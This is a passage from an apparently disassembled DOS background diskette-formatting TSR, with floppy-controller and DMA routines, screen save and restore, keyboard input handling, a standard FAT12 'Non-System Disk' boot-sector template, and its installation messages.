di,data_16e - mov bx,0 - mov ds,cs:data_91 - mov es,cs:data_91 - call sub_17 - mov si,data_2e - mov bx,0 - call sub_17 - pop es - pop ds - retn -sub_18 endp - - -; -; SUBROUTINE -; - -sub_19 proc near - mov ax,4ADh - mov data_93,ax - call sub_21 - retn -sub_19 endp - - -; -; SUBROUTINE -; - -sub_20 proc near - mov ax,6F7h - mov data_93,ax - call sub_21 - retn -sub_20 endp - - -; -; SUBROUTINE -; - -sub_21 proc near - push cx - push dx - push si - push di - push ax - xor di,di ; Zero register - mov si,cs:data_93 -loc_166: - lodsb ; String [si] to al - cmp al,1 - jne loc_169 ; Jump if not equal - lodsw ; String [si] to ax - mov cx,ax - test cl,80h - jz loc_167 ; Jump if zero - xchg ch,cl - and cx,7FFFh - lodsb ; String [si] to al - jmp short locloop_168 - db 90h -loc_167: - xchg al,ah - and cx,7Fh - -locloop_168: - call sub_25 - loop locloop_168 ; Loop if cx > 0 - - jmp short loc_170 - db 90h -loc_169: - call sub_25 -loc_170: - cmp di,0FA0h - jl loc_166 ; Jump if < - jnz loc_171 ; Jump if not zero - mov di,1 - jmp short loc_166 -loc_171: - pop ax - pop di - pop si - pop dx - pop cx - retn -sub_21 endp - - -; -; SUBROUTINE -; - -sub_22 proc near - push ds - mov ds,data_91 - mov si,data_4e - mov di,offset data_115 - mov cx,7 - cld ; Clear direction - repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop ds - cmp cx,0 - jne loc_ret_172 ; Jump if not equal - mov data_92,0D5h - call sub_44 - -loc_ret_172: - retn -sub_22 endp - - -; -; SUBROUTINE -; - -sub_23 proc near - mov ah,0Fh - int 10h ; Video display ah=functn 0Fh - ; get state, al=mode, bh=page - ; ah=columns on screen - mov ah,3 - int 10h ; Video display ah=functn 03h - ; get cursor loc in dx, mode cx - mov data_104,bh - mov data_105,cx - mov data_106,dx - call sub_18 - retn -sub_23 endp - - -; -; SUBROUTINE -; - -sub_24 proc near - mov data_93,1000h - mov ax,data_91 - push ds - mov ds,ax - call sub_21 - pop ds - mov bh,data_104 - mov dx,data_106 - mov ah,2 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - mov ah,1 - mov cx,data_105 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - retn -sub_24 endp - - -; -; SUBROUTINE -; - -sub_25 proc near - push es - mov es,cs:data_91 - mov dx,cs:data_90 - cli ; Disable interrupts - push ax -loc_173: - in al,dx ; port 0, DMA-1 bas&add ch 0 - test al,1 - jnz loc_173 ; Jump if not zero -loc_174: - in al,dx ; port 0, DMA-1 bas&add ch 0 - test al,1 - jz loc_174 ; Jump if zero - pop ax - mov es:[di],al - sti ; Enable interrupts - inc di - inc di - pop es - retn -sub_25 endp - - -; -; SUBROUTINE -; - -sub_26 proc near - cmp ah,1 - je loc_175 ; Jump if equal - cmp bx,0 - je loc_178 ; Jump if equal - cmp bx,1 - jne loc_175 ; Jump if not equal - xor bx,bx ; Zero register - xchg ah,al - stosb ; Store al to es:[di] - jmp short loc_179 - db 90h -loc_175: - push ax - inc bx - mov al,1 - stosb ; Store al to es:[di] - mov ax,bx - and bx,0FF80h - nop ;*ASM fixup - sign extn byte - jz loc_176 ; Jump if zero - or ax,8000h - xchg ah,al - stosw ; Store ax to es:[di] - jmp short loc_177 - db 90h -loc_176: - stosb ; Store al to es:[di] -loc_177: - xor bx,bx ; Zero register - pop ax -loc_178: - xchg ah,al -loc_179: - stosb ; Store al to es:[di] - retn -sub_26 endp - - -; -; SUBROUTINE -; - -sub_27 proc near - mov al,data_110 - mul data_111 ; ax = data * al - add ax,3Dh - mov di,ax - mov al,data_112 - mov cl,15h -loc_180: - call sub_25 - dec cl - cmp cl,0 - jne loc_180 ; Jump if not equal - retn -sub_27 endp - - -; -; SUBROUTINE -; - -sub_28 proc near - mov ds,data_25 - cmp byte ptr ds:video_mode_,7 - je loc_183 ; Jump if equal - cmp byte ptr ds:video_mode_,2 - je loc_182 ; Jump if equal - cmp byte ptr ds:video_mode_,3 - je loc_182 ; Jump if equal -loc_181: - push cs - pop ds - stc ; Set carry flag - retn -loc_182: - push cs - pop ds - clc ; Clear carry flag - retn -loc_183: - mov ds,cs:data_91 - xor si,si ; Zero register - mov cx,50h - xor bx,bx ; Zero register - cld ; Clear direction - -locloop_184: - lodsw ; String [si] to ax - cmp ah,al - jne loc_185 ; Jump if not equal - inc bx -loc_185: - loop locloop_184 ; Loop if cx > 0 - - cmp bx,0Ah - jg loc_181 ; Jump if > - jmp short loc_182 -sub_28 endp - - -; -; SUBROUTINE -; - -sub_29 proc near - mov cx,2 - mov es,data_25 - cld ; Clear direction - cli ; Disable interrupts - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - sti ; Enable interrupts - retn -sub_29 endp - - -; -; SUBROUTINE -; - -sub_30 proc near - clc ; Clear carry flag - mov word ptr ds:[1F0h],es - mov es,data_25 - cmp ax,es:[di] - jne loc_186 ; Jump if not equal - push cs - pop ax - cmp ax,es:[di+2] - je loc_187 ; Jump if equal -loc_186: - stc ; Set carry flag -loc_187: - mov es,word ptr ds:[1F0h] - retn -sub_30 endp - - -; -; SUBROUTINE -; - -sub_31 proc near - mov data_100,0F5h - mov data_97,9 - mov data_95,1 -loc_188: - mov al,data_95 - cbw ; Convrt byte to word - mov word ptr ds:[1A9h],0 - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,7 - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov si,data_100 - mov di,3A0h - cld ; Clear direction - call sub_35 - inc di - call sub_35 - mov data_100,si - mov dh,data_97 - mov dl,14h - mov si,3A0h - call sub_14 - mov si,data_100 - lodsw ; String [si] to ax - mov word ptr data_98,ax - mov data_100,si - mov word ptr ds:[1A9h],0 - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,2Dh ; '-' - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov bl,50h ; 'P' - xor bh,bh ; Zero register - cmp data_31,0 - jne loc_189 ; Jump if not equal - shr bx,1 ; Shift w/zeros fill -loc_189: - dec bx - mov ax,2 - mul bx ; dx:ax = reg * ax - mov bl,data_56 - xor bh,bh ; Zero register - mul bx ; dx:ax = reg * ax - mov bl,data_53 - add ax,bx - mov bx,word ptr data_98 - cmp byte ptr ds:[2423h],1 - je loc_190 ; Jump if equal - shl bx,1 ; Shift w/zeros fill -loc_190: - sub ax,bx - mov bx,200h - mul bx ; dx:ax = reg * ax - mov word ptr ds:[1A9h],dx - mov word ptr ds:[1ABh],ax - call sub_32 - mov dh,byte ptr ds:[1AFh] - mov dl,44h ; 'D' - sub dl,dh - mov dh,data_97 - mov si,0EDh - call sub_14 - mov al,data_99 - cmp data_95,al - jne loc_191 ; Jump if not equal - call sub_13 - retn -loc_191: - inc data_95 - inc data_97 - jmp loc_188 -sub_31 endp - - -; -; SUBROUTINE -; - -sub_32 proc near - mov di,0EDh - call sub_33 - mov word ptr ds:[1ADh],bx - mov byte ptr ds:[1AFh],bl - jz loc_195 ; Jump if zero -loc_192: - cld ; Clear direction - or al,30h ; '0' - stosb ; Store al to es:[di] - mov word ptr ds:[1A5h],0 - mov word ptr ds:[1A7h],0 - push di - mov di,word ptr ds:[1B0h] - add di,word ptr ds:[1B2h] - call sub_34 - pop di - mov ax,word ptr ds:[1A7h] - sub word ptr ds:[1ABh],ax - jnc loc_193 ; Jump if carry=0 - dec word ptr ds:[1A9h] -loc_193: - mov ax,word ptr ds:[1A5h] - sub word ptr ds:[1A9h],ax - dec word ptr ds:[1ADh] - cmp word ptr ds:[1ADh],0 - je loc_195 ; Jump if equal - call sub_33 -loc_194: - cmp bx,word ptr ds:[1ADh] - je loc_192 ; Jump if equal - push ax - mov al,30h ; '0' - stosb ; Store al to es:[di] - pop ax - dec word ptr ds:[1ADh] - cmp word ptr ds:[1ADh],0 - jne loc_194 ; Jump if not equal -loc_195: - mov ax,word ptr ds:[1ABh] - or al,30h ; '0' - cld ; Clear direction - stosb ; Store al to es:[di] - mov al,0 - stosb ; Store al to es:[di] - retn -sub_32 endp - - -; -; SUBROUTINE -; - -sub_33 proc near - mov dx,word ptr ds:[1A9h] - mov ax,word ptr ds:[1ABh] - mov word ptr ds:[1B0h],0 - mov word ptr ds:[1B2h],0 - cmp dx,0 - jne loc_196 ; Jump if not equal - cmp ax,2710h - jb loc_197 ; Jump if below -loc_196: - mov bx,2710h - mov word ptr ds:[1B0h],8 - div bx ; ax,dx rem=dx:ax/reg -loc_197: - cmp ax,0Ah - jb loc_200 ; Jump if below - mov word ptr ds:[1B2h],6 - xor dx,dx ; Zero register - mov bx,offset 1C8h -loc_198: - cmp ax,[bx] - jge loc_199 ; Jump if > or = - sub word ptr ds:[1B2h],2 - sub bx,2 - jmp short loc_198 -loc_199: - mov bx,[bx] - div bx ; ax,dx rem=dx:ax/reg -loc_200: - mov bx,word ptr ds:[1B0h] - add bx,word ptr ds:[1B2h] - shr bx,1 ; Shift w/zeros fill - retn -sub_33 endp - - -; -; SUBROUTINE -; - -sub_34 proc near - and al,0Fh - cbw ; Convrt byte to word - push ax - mov bx,offset 1C2h - mov bx,[bx+di] - mul bx ; dx:ax = reg * ax - add word ptr ds:[1A7h],ax - jnc loc_201 ; Jump if carry=0 - inc dx -loc_201: - add word ptr ds:[1A5h],dx - mov bx,offset 1B4h - pop ax - mov bx,[bx+di] - mul bx ; dx:ax = reg * ax - add word ptr ds:[1A5h],ax - retn -sub_34 endp - - -; -; SUBROUTINE -; - -sub_35 proc near - lodsb ; String [si] to al - call sub_36 - stosw ; Store ax to es:[di] - lodsb ; String [si] to al - call sub_36 - stosw ; Store ax to es:[di] - retn -sub_35 endp - - -; -; SUBROUTINE -; - -sub_36 proc near - mov ah,al - and ah,0Fh - mov cl,4 - shr al,cl ; Shift w/zeros fill - and al,0Fh - cmp al,0Ah - jge loc_202 ; Jump if > or = - add al,30h ; '0' - jmp short loc_203 - db 90h -loc_202: - add al,37h ; '7' -loc_203: - cmp ah,0Ah - jge loc_204 ; Jump if > or = - add ah,30h ; '0' - jmp short loc_ret_205 - db 90h -loc_204: - add ah,37h ; '7' - -loc_ret_205: - retn -sub_36 endp - - -; -; SUBROUTINE -; - -sub_37 proc near - mov al,data_29 - mov bx,offset data_30 - cbw ; Convrt byte to word - add bx,ax - mov al,[bx] - mov data_31,ax - retn -sub_37 endp - - -; -; SUBROUTINE -; - -sub_38 proc near - mov ah,1 - mov cx,7 - int 10h ; Video display ah=functn 01h - ; set cursor mode in cx - mov ah,3 - mov bh,data_104 - int 10h ; Video display ah=functn 03h - ; get cursor loc in dx, mode cx - mov data_108,dh - mov data_109,dl - mov di,137h - mov data_101,0 -loc_206: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - jne loc_207 ; Jump if not equal - retn -loc_207: - cmp al,1Bh - jne loc_208 ; Jump if not equal - pop ax - jmp loc_41 -loc_208: - cmp al,10h - je loc_209 ; Jump if equal - cmp ax,5300h - jne loc_210 ; Jump if not equal -loc_209: - call sub_41 - call sub_41 - jmp short loc_206 -loc_210: - cmp ax,4B00h - je loc_211 ; Jump if equal - cmp al,8 - jne loc_212 ; Jump if not equal -loc_211: - call sub_41 - jmp short loc_206 -loc_212: - cmp al,30h ; '0' - jb loc_213 ; Jump if below - cmp al,39h ; '9' - jg loc_213 ; Jump if > - cmp data_101,2 - je loc_213 ; Jump if equal - cld ; Clear direction - stosb ; Store al to es:[di] - inc data_101 - inc data_109 - call sub_10 - jmp short loc_206 -loc_213: - call sub_11 - jmp short loc_206 -sub_38 endp - - -; -; SUBROUTINE -; - -sub_39 proc near - mov si,offset data_33+6 ; (' ') -loc_214: - cmp al,0 - je loc_215 ; Jump if equal - add si,7 - dec al - jmp short loc_214 -loc_215: - mov di,offset data_189 -loc_216: - lodsb ; String [si] to al - cmp al,0 - jne loc_217 ; Jump if not equal - retn -loc_217: - stosb ; Store al to es:[di] -sub_39 endp - - -; -; SUBROUTINE -; - -sub_40 proc near - jmp short loc_216 -sub_40 endp - - -; -; SUBROUTINE -; - -sub_41 proc near - cmp data_101,0 - je loc_ret_218 ; Jump if equal - dec di - dec data_101 - dec data_109 - call sub_42 - mov al,20h ; ' ' - call sub_10 - call sub_42 - -loc_ret_218: - retn -sub_41 endp - - -; -; SUBROUTINE -; - -sub_42 proc near - mov ah,2 - mov bh,data_104 - mov dh,data_108 - mov dl,data_109 - int 10h ; Video display ah=functn 02h - ; set cursor location in dx - retn -sub_42 endp - - -; -; SUBROUTINE -; - -sub_43 proc near - push ds - mov ds,data_91 - mov si,data_4e - mov di,offset data_115 - mov cx,7 - cld ; Clear direction - repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] - cmp cx,0 - je loc_219 ; Jump if equal - mov di,offset data_113 - mov si,data_4e - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] -loc_219: - pop ds - call sub_44 - mov di,offset data_115 - mov si,data_92 - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_43 endp - - -; -; SUBROUTINE -; - -sub_44 proc near - push es - mov si,data_92 - mov es,data_91 - mov di,data_4e - mov cx,6 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - pop es - retn -sub_44 endp - - -; -; SUBROUTINE -; - -sub_45 proc near - call sub_28 - jnc loc_220 ; Jump if carry=0 - retn -loc_220: - call sub_43 - retn -sub_45 endp - - -; -; SUBROUTINE -; - -sub_46 proc near - call sub_28 - jnc loc_221 ; Jump if carry=0 - clc ; Clear carry flag - retn -loc_221: - cmp data_187,6666h - je loc_222 ; Jump if equal - mov data_92,3CEh - mov ah,data_65 - call sub_47 - mov byte ptr data_184+26h,al ; ('') - mov byte ptr data_184+28h,ah ; ('') - call sub_43 - retn -loc_222: - cmp data_92,3AAh - jne loc_ret_223 ; Jump if not equal - mov data_92,0D5h - call sub_44 - -loc_ret_223: - retn -sub_46 endp - - -; -; SUBROUTINE -; - -sub_47 proc near - cmp ah,0Ah - jl loc_226 ; Jump if < - mov al,31h ; '1' -loc_224: - sub ah,0Ah - cmp ah,0Ah - jl loc_225 ; Jump if < - add al,1 - jmp short loc_224 -loc_225: - or ah,30h ; '0' - retn -loc_226: - or ah,30h ; '0' - mov al,20h ; ' ' - retn -sub_47 endp - - -; -; SUBROUTINE -; - -sub_48 proc near - cld ; Clear direction - mov di,offset 14Dh -loc_227: - mov al,data_65 - stosb ; Store al to es:[di] - mov al,data_64 - stosb ; Store al to es:[di] - mov al,data_66 - stosb ; Store al to es:[di] - mov al,2 - stosb ; Store al to es:[di] - inc data_66 - mov al,data_66 - cmp al,data_56 - jle loc_227 ; Jump if < or = - mov data_66,1 - retn -sub_48 endp - - -; -; SUBROUTINE -; - -sub_49 proc near - pop ax - mov word ptr ds:[221h],ax - mov data_82,21E2h - mov al,byte ptr ds:[21Ah] - mov data_66,al - mov data_68,28E9h - mov data_67,1FFh - mov data_69,4Ah ; 'J' - mov data_70,0C5h - mov data_85,27F1h - call sub_75 - mov data_82,220Dh - mov ax,word ptr ds:[242Ch] - mov cl,byte ptr ds:[21Ah] - add cl,al - cmp cl,data_56 - jle loc_228 ; Jump if < or = - inc data_64 - sub cl,data_56 -loc_228: - mov data_66,cl - call sub_75 - inc byte ptr ds:[21Ah] - jmp word ptr ds:[221h] - -; External Entry into Subroutine - -sub_50: - mov si,offset data_220 - mov cx,word ptr ds:[21Dh] - inc cx - sub cx,si - jbe loc_229 ; Jump if below or = - mov di,offset data_214 - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - xor al,al ; Zero register - mov cx,1Bh - mov di,offset data_220 - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] -loc_229: - add word ptr ds:[21Fh],200h - mov word ptr ds:[21Dh],0 - retn -sub_49 endp - - -; -; SUBROUTINE -; - -sub_51 proc near - mov al,data_65 - dec al - cbw ; Convrt byte to word - mov bl,4 - div bl ; al, ah rem = ax/reg - mov cl,ah - cbw ; Convrt byte to word - mov di,ax - rol cl,1 ; Rotate - add cl,data_64 - mov al,80h - ror al,cl ; Rotate - or byte ptr ds:[139h][di],al - retn -sub_51 endp - - -; -; SUBROUTINE -; - -sub_52 proc near - mov data_65,0 - mov data_64,0 - mov data_66,1 - mov data_94,0 - mov data_63,0 - mov data_59,0F6h - retn -sub_52 endp - - -; -; SUBROUTINE -; - -sub_53 proc near - xor al,al ; Zero register - mov cx,200h - mov di,offset data_214 - cld ; Clear direction - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] - retn -sub_53 endp - - mov di,data_100 - mov ax,0D1BAh - cld ; Clear direction - stosw ; Store ax to es:[di] - stosw ; Store ax to es:[di] - mov ax,data_54 - stosw ; Store ax to es:[di] - mov data_100,di - inc data_95 - inc data_99 - retn - -; -; SUBROUTINE -; - -sub_54 proc near - mov word ptr data_98,0 - mov si,offset 139h - cld ; Clear direction -loc_230: - lodsb ; String [si] to al - mov cl,4 -loc_231: - mov ah,al - and ah,3 - cmp ah,3 - je loc_232 ; Jump if equal - cmp ah,0 - je loc_233 ; Jump if equal - mov bl,data_56 - call sub_57 - jmp short loc_233 - db 90h -loc_232: - mov bl,data_56 - shl bl,1 ; Shift w/zeros fill - call sub_57 -loc_233: - dec cl - jz loc_234 ; Jump if zero - shr al,1 ; Shift w/zeros fill - shr al,1 ; Shift w/zeros fill - jmp short loc_231 -loc_234: - cmp si,14Dh - jl loc_230 ; Jump if < - retn -sub_54 endp - - -; -; SUBROUTINE -; - -sub_55 proc near - push cx - mov al,byte ptr ds:[2423h] - cbw ; Convrt byte to word - mov bx,ax - mov al,data_53 - cbw ; Convrt byte to word - add ax,word ptr ds:[223h] - xor dx,dx ; Zero register - div bx ; ax,dx rem=dx:ax/reg - call sub_59 - xor dx,dx ; Zero register - mov bx,2 - div bx ; ax,dx rem=dx:ax/reg - call sub_58 - mov bx,3 - mul bx ; dx:ax = reg * ax - add ax,3 - add ax,cx - pop cx - retn -sub_55 endp - - -; -; SUBROUTINE -; - -sub_56 proc near - mov ah,data_95 - inc ah - call sub_47 - mov data_190,ax - retn -sub_56 endp - - -; -; SUBROUTINE -; - -sub_57 proc near - xor bh,bh ; Zero register - cmp data_56,9 - jne loc_235 ; Jump if not equal - clc ; Clear carry flag - rcr bx,1 ; Rotate thru carry - adc bx,0 -loc_235: - add word ptr data_98,bx - retn -sub_57 endp - - -; -; SUBROUTINE -; - -sub_58 proc near - cmp dx,0 - je loc_236 ; Jump if equal - mov cx,1 - retn -loc_236: - mov cx,dx - retn -sub_58 endp - - -; -; SUBROUTINE -; - -sub_59 proc near - test al,1 - jz loc_237 ; Jump if zero - mov word ptr ds:[229h],2 - retn -loc_237: - mov word ptr ds:[229h],0 - retn -sub_59 endp - - -; -; SUBROUTINE -; - -sub_60 proc near - mov di,offset 139h - xor al,al ; Zero register - mov cx,14h - cld ; Clear direction - repne stosb ; Rep zf=0+cx >0 Store al to es:[di] - retn -sub_60 endp - - -; -; SUBROUTINE -; - -sub_61 proc near - mov si,data_31 - mov bx,offset data_41 - mov al,[bx+si] - mov byte ptr ds:[2423h],al - mov bx,offset data_47 - mov al,[bx+si] - mov byte ptr ds:[242Bh],al - mov bx,offset data_39 - mov al,[bx+si] - mov data_71,al - mov bx,offset data_43 - mov al,[bx+si] - mov data_55,al - mov bx,offset data_44 - mov al,[bx+si] - mov data_56,al - and ax,0FFh - mov word ptr ds:[242Eh],ax - mov bx,offset data_45 - mov al,[bx+si] - mov data_57,al - mov bx,offset data_46 - mov al,[bx+si] - mov data_58,al - mov bx,offset data_52 - mov al,[bx+si] - mov data_53,al - shl si,1 ; Shift w/zeros fill - mov bx,offset data_48 - mov ax,[bx+si] - mov word ptr ds:[2427h],ax - mov bx,offset data_40 - mov ax,[bx+si] - mov data_61,ax - mov bx,offset data_37 - mov ax,[bx+si] - mov word ptr data_60,ax - mov bx,69h - mov ax,[bx+si] - mov word ptr ds:[2429h],ax - mov bx,offset data_50 - mov ax,[bx+si] - mov word ptr ds:[242Ch],ax - mov bx,offset data_51 - mov ax,[bx+si] - mov data_54,ax - mov ah,4 - int 1Ah ; Real time clock ah=func 04h - ; get date cx=year, dx=mon/day - mov word ptr ds:[243Fh],dx - cmp data_31,0 - jne loc_238 ; Jump if not equal - mov word ptr ds:[216h],143h - retn -loc_238: - mov word ptr ds:[216h],14Dh - retn -sub_61 endp - - jmp short loc_239 - nop - inc dx - inc si - dec di - push dx - dec bp - inc cx - push sp - and [bx+si],al - add al,[bx+si] - add [bx+si],ax - add al,[bx+si] - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add al,[bx+si] - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - sub [bx+si],ax - add [bx+si],al - add [bp+4Fh],cl - db ' NAME FAT12 ', 0Dh, 0Ah, ' ' - db 'Non-System Disk ...', 0Dh, 0Ah, ' ' - db 'Replace And Press Any Key When R' - db 'eady...', 0Dh, 0Ah, 0 -loc_239: - xor ax,ax ; Zero register - cli ; Disable interrupts - mov ss,ax - mov sp,7C00h - sti ; Enable interrupts - push cs - pop ds - mov si,data_234e - cld ; Clear direction -loc_240: - lodsb ; String [si] to al - test al,al - jz loc_241 ; Jump if zero - mov ah,0Eh - xor bx,bx ; Zero register - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_240 -loc_241: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - int 19h ; Bootstrap loader - db 347 dup (0) - db 55h,0AAh - -; -; SUBROUTINE -; - -sub_62 proc near - mov byte ptr ds:[22Fh],1 - mov ds,data_25 - mov al,0FFh - mov ds:dsk_motor_tmr_,al - mov al,ds:dsk_motor_stat_ - and al,0Fh - push cs - pop ds - cmp al,0 - je loc_242 ; Jump if equal - retn -loc_242: - mov cl,data_29 - mov al,10h - shl al,cl ; Shift w/zeros fill - mov ah,al - or al,cl - or al,0Ch - mov dx,3F2h - out dx,al ; port 3F2h, dsk0 contrl output - mov cl,4 - rol ah,cl ; Rotate - mov ds,data_25 - mov ds:dsk_motor_stat_,ah - push cs - pop ds - mov byte ptr ds:[22Dh],2 - call sub_7 - retn -sub_62 endp - - -; -; SUBROUTINE -; - -sub_63 proc near - pop ax - mov data_86,ax - call sub_62 - call sub_67 - jmp short loc_243 - db 90h - -; External Entry into Subroutine - -sub_64: - pop ax - mov data_86,ax - mov data_63,0 - call sub_62 - call sub_66 -loc_243: - call sub_79 - call sub_68 - jc loc_244 ; Jump if carry Set - jmp data_86 -loc_244: - clc ; Clear carry flag - jmp loc_123 -sub_63 endp - - -; -; SUBROUTINE -; - -sub_65 proc near - pop ax - mov data_88,ax - call sub_64 - test data_73,0C0h - jz loc_245 ; Jump if zero - call sub_64 - test data_73,0C0h - jz loc_245 ; Jump if zero - jmp loc_123 -loc_245: - mov al,data_65 - cmp data_31,0 - jne loc_246 ; Jump if not equal - shl al,1 ; Shift w/zeros fill -loc_246: - mov data_63,al - call sub_63 - jmp data_88 - -; External Entry into Subroutine - -sub_66: - mov ah,7 - call sub_71 - mov ah,data_29 - call sub_71 - retn -sub_65 endp - - -; -; SUBROUTINE -; - -sub_67 proc near - mov ah,0Fh - call sub_71 - mov ah,data_29 - call sub_71 - mov ah,data_63 - call sub_71 - retn -sub_67 endp - - -; -; SUBROUTINE -; - -sub_68 proc near - mov ah,8 - call sub_71 - call sub_70 - mov data_73,al - call sub_70 - mov data_72,al - retn -sub_68 endp - - -; -; SUBROUTINE -; - -sub_69 proc near - call sub_70 - mov data_73,al - call sub_70 - mov data_74,al - call sub_70 - mov data_75,al - call sub_70 - mov data_77,al - call sub_70 - mov data_78,al - call sub_70 - mov data_79,al - call sub_70 - mov data_80,al - retn -sub_69 endp - - -; -; SUBROUTINE -; - -sub_70 proc near - mov dx,3F4h - xor cx,cx ; Zero register - -locloop_247: - in al,dx ; port 3F4h, dsk0 cntrlr status - and al,0C0h - cmp al,0C0h - je loc_248 ; Jump if equal - loop locloop_247 ; Loop if cx > 0 - - pop ax - stc ; Set carry flag - retn -loc_248: - inc dx - in al,dx ; port 3F5h, dsk0 controlr data - clc ; Clear carry flag - retn -sub_70 endp - - -; -; SUBROUTINE -; - -sub_71 proc near - mov dx,3F4h - xor cx,cx ; Zero register - -locloop_249: - in al,dx ; port 3F4h, dsk0 cntrlr status - and al,0C0h - cmp al,80h - je loc_250 ; Jump if equal - loop locloop_249 ; Loop if cx > 0 - - pop ax - stc ; Set carry flag - retn -loc_250: - mov al,ah - inc dx - out dx,al ; port 3F5h, dsk0 controlr data - clc ; Clear carry flag - retn -sub_71 endp - - -; -; SUBROUTINE -; - -sub_72 proc near - mov dx,3F7h - mov al,data_71 - out dx,al ; port 3F7h ??I/O Non-standard - retn -sub_72 endp - - -; -; SUBROUTINE -; - -sub_73 proc near - mov al,2 - out 0Ch,al ; port 0Ch, DMA-1 clr byte ptr - jmp short $+2 ; delay for I/O - mov al,ah - out 0Bh,al ; port 0Bh, DMA-1 mode reg - mov bx,data_68 - push cs - pop ax - mov cl,4 - rol ax,cl ; Rotate - mov ch,al - and al,0F0h - add ax,bx - jnc loc_251 ; Jump if carry=0 - inc ch -loc_251: - out 4,al ; port 4, DMA-1 bas&add ch 2 - jmp short $+2 ; delay for I/O - mov al,ah - out 4,al ; port 4, DMA-1 bas&add ch 2 - jmp short $+2 ; delay for I/O - mov al,ch - and al,0Fh - out 81h,al ; port 81h, DMA page reg ch 2 - mov ax,data_67 - out 5,al ; port 5, DMA-1 bas&cnt ch 2 - jmp short $+2 ; delay for I/O - mov al,ah - out 5,al ; port 5, DMA-1 bas&cnt ch 2 - jmp short $+2 ; delay for I/O - mov al,2 - out 0Ah,al ; port 0Ah, DMA-1 mask reg bit - retn -sub_73 endp - - -; -; SUBROUTINE -; - -sub_74 proc near - pop ax - mov data_86,ax - mov data_68,28E9h - mov data_67,1FFh - mov data_69,46h ; 'F' - mov data_70,0E6h - call sub_62 - call sub_72 - mov ah,data_69 - call sub_73 - call sub_76 - jc loc_252 ; Jump if carry Set - call sub_79 - call sub_69 - jc loc_252 ; Jump if carry Set - jmp data_86 -loc_252: - clc ; Clear carry flag - call sub_7 - jmp loc_123 -sub_74 endp - - -; -; SUBROUTINE -; - -sub_75 proc near - pop ax - mov data_86,ax - call sub_62 - call sub_72 - mov ah,data_69 - call sub_73 - call data_85 - jc loc_253 ; Jump if carry Set - call sub_79 - call sub_69 - jc loc_253 ; Jump if carry Set - jmp data_86 -loc_253: - clc ; Clear carry flag - call sub_7 - jmp loc_123 -sub_75 endp - - -; -; SUBROUTINE -; - -sub_76 proc near - mov ah,data_70 - call sub_71 - mov ah,data_29 - cmp data_64,0 - je loc_254 ; Jump if equal - or ah,4 -loc_254: - call sub_71 - mov ah,data_65 - call sub_71 - mov ah,data_64 - call sub_71 - mov ah,data_66 - call sub_71 - mov ah,2 - call sub_71 - mov ah,data_56 - call sub_71 - mov ah,data_57 - call sub_71 - mov ah,0FFh - call sub_71 - retn -sub_76 endp - - mov ah,4Dh ; 'M' - call sub_71 - mov ah,data_29 - cmp data_64,0 - je loc_255 ; Jump if equal - or ah,4 -loc_255: - call sub_71 - mov ah,2 - call sub_71 - mov ah,data_56 - call sub_71 - mov ah,data_58 - call sub_71 - mov ah,data_59 - call sub_71 - retn - -; -; SUBROUTINE -; - -sub_77 proc near - mov ah,4 - call sub_71 - mov ah,data_29 - call sub_71 - call sub_70 - mov data_76,al - retn -sub_77 endp - - -; -; SUBROUTINE -; - -sub_78 proc near - pop ax - mov data_87,ax - call sub_48 - mov ax,data_61 - mov data_67,ax - mov data_68,14Dh - mov data_69,4Ah ; 'J' - mov data_85,2837h - call sub_75 - test data_73,0C0h - jnz loc_256 ; Jump if not zero - jmp data_87 -loc_256: - test data_74,2 - jz loc_257 ; Jump if zero - jmp loc_86 -loc_257: - cmp data_94,2 - jne loc_258 ; Jump if not equal - mov data_94,0 - jmp loc_93 -loc_258: - inc data_94 - call sub_65 - test data_73,0C0h - jnz loc_259 ; Jump if not zero - jmp data_82 -loc_259: - jmp loc_123 -sub_78 endp - - -; -; SUBROUTINE -; - -sub_79 proc near - mov cx,18h - -locloop_260: - call sub_7 - cmp byte ptr ds:[22Fh],0 - jne loc_261 ; Jump if not equal - retn -loc_261: - loop locloop_260 ; Loop if cx > 0 - - pop ax - jmp loc_123 -sub_79 endp - -data_214 db 0 -data_215 dw 0 - db 8 dup (0) -data_217 dw 0 - db 26 dup (0) -data_218 dw 0 -data_219 dw 0 - db 469 dup (0) -data_220 db 0 - db 154 dup (0) -data_221 db 0Dh, 0Ah, ' Mem Resident Format A' - db 'lready Installed', 0Dh, 0Ah, 'Al' - db 't + Left Shift + Right Shift Wil' - db 'l Activate', 0Dh, 0Ah, '$' -data_222 db 0Dh, 0Ah, 'Background Formatter I' - db 's Installed', 0Dh, 0Ah, 'Alt + L' - db 'eft Shift + Right Shift Will Act' - db 'ivate', 0Dh, 0Ah, '$' -data_223 db 0Dh, 0Ah, 'No Diskette Drive Conn' - db 'ect', 0Dh, 0Ah, 'Program Termina' - db 'ted !', 0Dh, 0Ah, '$' - db 'There Are ' -data_224 db 0 - db ' Diskette Drives Connected' - db 0 -data_225 db 0 - db 20h,0C4h - db 14 dup (0C4h) -data_227 db ' ', 0 - db 'Is This Configuration Correct ? ' - db '[Y]', 0 - db 'How Many Diskette Drives ( Not I' - db 'nclude Fixed Disk ) ?', 0 - db 'DRIVE ', 0 - db ' ( 0 - 360K, 1 - 1.2M, 2 - 720K,' - db ' 3 - 